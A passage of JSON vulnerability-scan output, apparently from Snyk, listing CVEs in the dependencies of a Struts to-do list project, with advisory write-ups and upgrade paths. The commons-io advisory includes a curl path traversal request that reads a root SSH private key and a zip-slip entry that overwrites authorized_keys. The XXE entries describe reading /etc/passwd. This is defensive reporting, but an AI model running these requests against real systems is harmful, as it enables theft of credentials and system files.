"2024-03-11T09:53:59.806365Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:49.130585Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:57.097583Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:59.094771Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.806365Z" - } - ], - "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.\r\n\r\n**NOTE:** After upgrading to the fixed version, the `setFileCountMax()` must be explicitly set to avoid this vulnerability.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.5 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17)\n- [GitHub Commit (Tomcat)](https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e)\n", - "epssDetails": { - "percentile": "0.91407", - "probability": "0.03359", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-24998" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "commons-fileupload:commons-fileupload", - "proprietary": false, - "creationTime": "2023-02-21T08:19:49.294883Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-02-21T08:00:22Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-fileupload", - "artifactId": "commons-fileupload" - }, - "publicationTime": "2023-02-21T09:23:34.093821Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.806365Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@6.1.2", - "commons-fileupload:commons-fileupload@1.5" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-fileupload:commons-fileupload", - "version": "1.3.1" - }, - { - "id": "SNYK-JAVA-COMMONSIO-1277109", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", - "credit": [ - "Lukas Euler" - ], - "semver": { - "vulnerable": [ - "[0, 2.7)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-io:commons-io", - "references": [ - { - "url": "https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/IO-556", - "title": "Jira Issue" - }, - { - "url": "https://github.com/AlAIAL90/CVE-2021-29425", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:20.715148Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.8, - "modificationTime": "2024-03-11T09:51:34.519777Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.8, - "modificationTime": "2024-03-11T09:53:56.345148Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:37.151008Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:20.715148Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:34.519777Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:56.345148Z" - } - ], - "description": "## Overview\n[commons-io:commons-io](https://search.maven.org/artifact/commons-io/commons-io) is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.\n\nAffected versions of this package are vulnerable to Directory Traversal via calling the method FileNameUtils.normalize using an improper string like `//../foo` or `\\\\..\\foo`, which may allow access to files in the parent directory.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `commons-io:commons-io` to version 2.7 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d)\n- [Jira Issue](https://issues.apache.org/jira/browse/IO-556)\n- [PoC](https://github.com/AlAIAL90/CVE-2021-29425)\n", - "epssDetails": { - "percentile": "0.54510", - "probability": "0.00171", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-29425" - ], - "CWE": [ - "CWE-20", - "CWE-22" - ], - "GHSA": [ - "GHSA-gwrp-pvrq-jmwv" - ] - }, - "packageName": "commons-io:commons-io", - "proprietary": false, - "creationTime": "2021-04-27T10:51:05.462338Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-04-26T16:04:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-io", - "artifactId": "commons-io" - }, - "publicationTime": "2021-04-27T14:26:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:56.345148Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "commons-io:commons-io@2.2" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@6.0.0", - "commons-io:commons-io@2.9.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-io:commons-io", - "version": "2.2" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-JAVAXSERVLET-30449", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "David Jorm" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "javax.servlet:jstl", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", - "title": "NVD" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2015-0254", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "cvssV3BaseScore": 7.6, - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:43.270072Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", - "epssDetails": { - "percentile": "0.94002", - "probability": "0.07046", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-0254" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-6x4w-8w53-xrvv" - ] - }, - "packageName": "javax.servlet:jstl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.341000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-02-27T16:13:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "javax.servlet", - "artifactId": "jstl" - }, - "publicationTime": "2015-02-27T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.017447Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "javax.servlet:jstl", - "version": "1.2" - }, - { - "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", - "type": "license", - "title": "CDDL-1.0 license", - "semver": { - "vulnerable": [ - "[1.2,)" - ] - }, - "license": "CDDL-1.0", - "language": "java", - "description": "CDDL-1.0 license", - "packageName": "javax.servlet:jstl", - "creationTime": "2024-06-18T08:06:13.191Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T08:06:13.191Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "javax.servlet:jstl", - "version": "1.2" - }, - { - "id": "SNYK-JAVA-OGNL-30474", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Tao Wang" - ], - "semver": { - "vulnerable": [ - "[,3.0.12)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.0.12" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "ognl:ognl", - "references": [ - { - "url": "https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:50.033229Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.218889Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:50.033229Z" - } - ], - "description": "## Overview\n[`ognl:ognl`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22ognl%22) is a simple Expression Language (EL) for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) 